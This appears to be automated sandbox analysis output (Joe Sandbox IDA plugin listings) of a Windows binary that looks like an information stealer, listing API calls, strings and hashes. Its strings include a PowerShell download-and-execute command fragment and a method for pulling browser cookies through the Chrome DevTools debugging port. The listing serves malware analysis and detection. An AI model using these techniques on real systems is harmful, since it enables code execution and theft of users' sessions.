                        • Instruction Fuzzy Hash: 6F71E971B4021CAFDB25EB64DC4AFED7378AF88700F540494B719AB1C0DEB0AE888B54
                        APIs
                        • lstrcpy.KERNEL32 ref: 0091ABCF
                        • lstrlen.KERNEL32(015EFE68), ref: 0091ABE5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091AC0D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0091AC18
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091AC41
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091AC84
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0091AC8E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091ACB7
                        • lstrlen.KERNEL32(00934AD4), ref: 0091ACD1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091ACF3
                        • lstrcat.KERNEL32(00000000,00934AD4), ref: 0091ACFF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091AD28
                        • lstrlen.KERNEL32(00934AD4), ref: 0091AD3A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091AD5C
                        • lstrcat.KERNEL32(00000000,00934AD4), ref: 0091AD68
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091AD91
                        • lstrlen.KERNEL32(015EFE80), ref: 0091ADA7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091ADCF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0091ADDA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091AE03
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091AE3F
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0091AE49
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091AE6F
                        • lstrlen.KERNEL32(00000000), ref: 0091AE85
                        • lstrcpy.KERNEL32(00000000,015EFF40), ref: 0091AEB8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen
                        • String ID: f
                        • API String ID: 2762123234-1993550816
                        • Opcode ID: 4b955181100c7782ae541bb9ada3819616a05384c09cc0722f0f9a8faa13ccb6
                        • Instruction ID: 79d4fe55e85cabd4585a7d2e8e34569fa8b3b7a1629ba945b7b2664eba49e1b2
                        • Opcode Fuzzy Hash: 4b955181100c7782ae541bb9ada3819616a05384c09cc0722f0f9a8faa13ccb6
                        • Instruction Fuzzy Hash: 00B15E30A1261A9FCB22EB68DD4DBAFB7B9AF80301F140524F815A7291DF74DD45CB91
                        APIs
                        • LoadLibraryA.KERNEL32(ws2_32.dll,?,009172A4), ref: 009247E6
                        • GetProcAddress.KERNEL32(00000000,connect), ref: 009247FC
                        • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0092480D
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0092481E
                        • GetProcAddress.KERNEL32(00000000,htons), ref: 0092482F
                        • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00924840
                        • GetProcAddress.KERNEL32(00000000,recv), ref: 00924851
                        • GetProcAddress.KERNEL32(00000000,socket), ref: 00924862
                        • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00924873
                        • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00924884
                        • GetProcAddress.KERNEL32(00000000,send), ref: 00924895
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                        • API String ID: 2238633743-3087812094
                        • Opcode ID: c2eb248b7d329515131fb39b6e39586daa69dfbf00156a562fb130dba16e60f6
                        • Instruction ID: bc2be4afb4939c3d3adf2d16db0d9ff5b86129ab6f6defaffbe00b337065a6bf
                        • Opcode Fuzzy Hash: c2eb248b7d329515131fb39b6e39586daa69dfbf00156a562fb130dba16e60f6
                        • Instruction Fuzzy Hash: B71105769A6730AFC7249FF9AD0DA5E3AB8BA4D70A725081AF051D3160DFF48404DF91
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091BE53
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091BE86
                        • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0091BE91
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091BEB1
                        • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0091BEBD
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091BEE0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0091BEEB
                        • lstrlen.KERNEL32(')"), ref: 0091BEF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091BF13
                        • lstrcat.KERNEL32(00000000,')"), ref: 0091BF1F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091BF46
                        • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0091BF66
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091BF88
                        • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0091BF94
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091BFBA
                        • ShellExecuteEx.SHELL32(?), ref: 0091C00C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 4016326548-898575020
                        • Opcode ID: eecef2e952f656a18e7c74fbab04d8047c2336428c0346ba2bb9ae474ae04403
                        • Instruction ID: ad8fcdc21025d8ec6a654780343929e5375a47378297c1cb80c71e4a5c3556f6
                        • Opcode Fuzzy Hash: eecef2e952f656a18e7c74fbab04d8047c2336428c0346ba2bb9ae474ae04403
                        • Instruction Fuzzy Hash: F761A171B1061AAFCB21BFB99D8D6EF7BA9AF84300F140429F505E3291DF34D9468B91
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0092184F
                        • lstrlen.KERNEL32(015D7010), ref: 00921860
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921887
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00921892
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009218C1
                        • lstrlen.KERNEL32(00934FA0), ref: 009218D3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009218F4
                        • lstrcat.KERNEL32(00000000,00934FA0), ref: 00921900
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0092192F
                        • lstrlen.KERNEL32(015D7030), ref: 00921945
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0092196C
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00921977
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009219A6
                        • lstrlen.KERNEL32(00934FA0), ref: 009219B8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009219D9
                        • lstrcat.KERNEL32(00000000,00934FA0), ref: 009219E5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921A14
                        • lstrlen.KERNEL32(015D70A0), ref: 00921A2A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921A51
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00921A5C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921A8B
                        • lstrlen.KERNEL32(015D7040), ref: 00921AA1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921AC8
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00921AD3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921B02
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen
                        • String ID:
                        • API String ID: 1049500425-0
                        • Opcode ID: cafe9efc57ecfc607a16ba3486a27b29de92ac9aa5424c842226b04cb7e4ccb0
                        • Instruction ID: b1e0e7b1b8b4aa52ff6660005f84b066060bb65079d8585481d754d49a995112
                        • Opcode Fuzzy Hash: cafe9efc57ecfc607a16ba3486a27b29de92ac9aa5424c842226b04cb7e4ccb0
                        • Instruction Fuzzy Hash: FD913175601713AFDB209FB9ED88A1AB7ECEF54300F244828B896D3295DF74E855CB50
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 00914793
                        • LocalAlloc.KERNEL32(00000040,?), ref: 009147C5
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00914812
                        • lstrlen.KERNEL32(00934B60), ref: 0091481D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091483A
                        • lstrcat.KERNEL32(00000000,00934B60), ref: 00914846
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091486B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914898
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009148A3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009148CA
                        • StrStrA.SHLWAPI(?,00000000), ref: 009148DC
                        • lstrlen.KERNEL32(?), ref: 009148F0
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00914931
                        • lstrcpy.KERNEL32(00000000,?), ref: 009149B8
                        • lstrcpy.KERNEL32(00000000,?), ref: 009149E1
                        • lstrcpy.KERNEL32(00000000,?), ref: 00914A0A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00914A30
                        • lstrcpy.KERNEL32(00000000,?), ref: 00914A5D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 4107348322-3310892237
                        • Opcode ID: b50a5efc33efd42250903e6a308e1d13e2d4ac69198e318d5a9150bf7a9049b4
                        • Instruction ID: 9ed91c8a9d3ed75b3616be02f70f6bbec4f03a1cc210a272573990ddae2975b3
                        • Opcode Fuzzy Hash: b50a5efc33efd42250903e6a308e1d13e2d4ac69198e318d5a9150bf7a9049b4
                        • Instruction Fuzzy Hash: E9B1C571B1160A9FCB21EF78D989ADF77B9AF88700F154428F856A7291DF30EC458B90
                        APIs
                          • Part of subcall function 009090C0: InternetOpenA.WININET(0092CFEC,00000001,00000000,00000000,00000000), ref: 009090DF
                          • Part of subcall function 009090C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 009090FC
                          • Part of subcall function 009090C0: InternetCloseHandle.WININET(00000000), ref: 00909109
                        • strlen.MSVCRT ref: 009092E1
                        • strlen.MSVCRT ref: 009092FA
                          • Part of subcall function 00908980: std::_Xinvalid_argument.LIBCPMT ref: 00908996
                        • strlen.MSVCRT ref: 00909399
                        • strlen.MSVCRT ref: 009093E6
                        • lstrcat.KERNEL32(?,cookies), ref: 00909547
                        • lstrcat.KERNEL32(?,00931794), ref: 00909559
                        • lstrcat.KERNEL32(?,?), ref: 0090956A
                        • lstrcat.KERNEL32(?,00934B98), ref: 0090957C
                        • lstrcat.KERNEL32(?,?), ref: 0090958D
                        • lstrcat.KERNEL32(?,.txt), ref: 0090959F
                        • lstrlen.KERNEL32(?), ref: 009095B6
                        • lstrlen.KERNEL32(?), ref: 009095DB
                        • lstrcpy.KERNEL32(00000000,?), ref: 00909614
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                        • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                        • API String ID: 1201316467-3542011879
                        • Opcode ID: 9739e6fd20d074e5e44f3fe8de9ce140c22d42d2abb706362e17bfeb03c23bfe
                        • Instruction ID: f5839546f0c9baffcd7c25d27a60c25120bd8ae66387b8c8b7c70fe0c42c8bde
                        • Opcode Fuzzy Hash: 9739e6fd20d074e5e44f3fe8de9ce140c22d42d2abb706362e17bfeb03c23bfe
                        • Instruction Fuzzy Hash: 67E12671E10219DFDF14DFA8D984ADEBBB5BF88300F1044A9E509A7291DB74AE49CF90
                        APIs
                        • memset.MSVCRT ref: 0091D9A1
                        • memset.MSVCRT ref: 0091D9B3
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0091D9DB
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091DA0E
                        • lstrcat.KERNEL32(?,00000000), ref: 0091DA1C
                        • lstrcat.KERNEL32(?,015EFFD0), ref: 0091DA36
                        • lstrcat.KERNEL32(?,?), ref: 0091DA4A
                        • lstrcat.KERNEL32(?,015EE290), ref: 0091DA5E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091DA8E
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0091DA95
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091DAFE
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 2367105040-0
                        • Opcode ID: cbd76ee105f45eef41f1105e23e989528962deb20283cd9507729562f519b454
                        • Instruction ID: 2c1736f2fb5942f420e5669703475f768e4f2be68638fd76e8e2bd8c5d227ca3
                        • Opcode Fuzzy Hash: cbd76ee105f45eef41f1105e23e989528962deb20283cd9507729562f519b454
                        • Instruction Fuzzy Hash: 2AB19171A112199FDB10EFA4DC889EE77B9BF88300F144965F946E7290DB349E85CB90
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090B330
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B37E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B3A9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090B3B1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B3D9
                        • lstrlen.KERNEL32(00934C50), ref: 0090B450
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B474
                        • lstrcat.KERNEL32(00000000,00934C50), ref: 0090B480
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B4A9
                        • lstrlen.KERNEL32(00000000), ref: 0090B52D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B557
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090B55F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B587
                        • lstrlen.KERNEL32(00934AD4), ref: 0090B5FE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B622
                        • lstrcat.KERNEL32(00000000,00934AD4), ref: 0090B62E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B65E
                        • lstrlen.KERNEL32(?), ref: 0090B767
                        • lstrlen.KERNEL32(?), ref: 0090B776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090B79E
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID:
                        • API String ID: 2500673778-0
                        • Opcode ID: d430154f015f0a91d7ca0780600bb7619b0da5d472019978304112340a5b2366
                        • Instruction ID: f8bbacc8e4444b9dcdf3f4b0566e96bdf169578605e1e14b14c888c24020d811
                        • Opcode Fuzzy Hash: d430154f015f0a91d7ca0780600bb7619b0da5d472019978304112340a5b2366
                        • Instruction Fuzzy Hash: AA024030A01605DFCB25DF69D989B6EB7F9AF44714F298069E409AB2E1DB71DC42CF80
                        APIs
                          • Part of subcall function 009271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009271FE
                        • RegOpenKeyExA.ADVAPI32(?,015EB518,00000000,00020019,?), ref: 009237BD
                        • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 009237F7
                        • wsprintfA.USER32 ref: 00923822
                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00923840
                        • RegCloseKey.ADVAPI32(?), ref: 0092384E
                        • RegCloseKey.ADVAPI32(?), ref: 00923858
                        • RegQueryValueExA.ADVAPI32(?,015EFCE8,00000000,000F003F,?,?), ref: 009238A1
                        • lstrlen.KERNEL32(?), ref: 009238B6
                        • RegQueryValueExA.ADVAPI32(?,015EFEC8,00000000,000F003F,?,00000400), ref: 00923927
                        • RegCloseKey.ADVAPI32(?), ref: 00923972
                        • RegCloseKey.ADVAPI32(?), ref: 00923989
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 13140697-3278919252
                        • Opcode ID: 41e4da6ef39a4597adad1e5daa5ff26a5c20cc3032e33f1142fa3f833a18793b
                        • Instruction ID: 1e740f179c95d5fe72b54f9676819796ffa90b5c2debebe2ad84e802848d6f61
                        • Opcode Fuzzy Hash: 41e4da6ef39a4597adad1e5daa5ff26a5c20cc3032e33f1142fa3f833a18793b
                        • Instruction Fuzzy Hash: 88918C72900218DFCB10DF94ED84AEEB7B9FB88310F248569E509BB255DB35AE45CF90
                        APIs
                        • InternetOpenA.WININET(0092CFEC,00000001,00000000,00000000,00000000), ref: 009090DF
                        • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 009090FC
                        • InternetCloseHandle.WININET(00000000), ref: 00909109
                        • InternetReadFile.WININET(?,?,?,00000000), ref: 00909166
                        • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00909197
                        • InternetCloseHandle.WININET(00000000), ref: 009091A2
                        • InternetCloseHandle.WININET(00000000), ref: 009091A9
                        • strlen.MSVCRT ref: 009091BA
                        • strlen.MSVCRT ref: 009091ED
                        • strlen.MSVCRT ref: 0090922E
                        • strlen.MSVCRT ref: 0090924C
                          • Part of subcall function 00908980: std::_Xinvalid_argument.LIBCPMT ref: 00908996
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                        • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                        • API String ID: 1530259920-2144369209
                        • Opcode ID: 74d4433d8ce7af22951d84df2db944e0bb7cd408cc3fd4a4621b6fb9dde92715
                        • Instruction ID: 6f07b794465852eb1b52a961b2387d43308ed89e1f1a29cc4a717b669c5d020b
                        • Opcode Fuzzy Hash: 74d4433d8ce7af22951d84df2db944e0bb7cd408cc3fd4a4621b6fb9dde92715
                        • Instruction Fuzzy Hash: F151B371740209ABD720DBA8EC45FDEF7F9DB88710F140569F505E3281DBB4EA448BA5
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 009216A1
                        • lstrcpy.KERNEL32(00000000,015DA7A8), ref: 009216CC
                        • lstrlen.KERNEL32(?), ref: 009216D9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009216F6
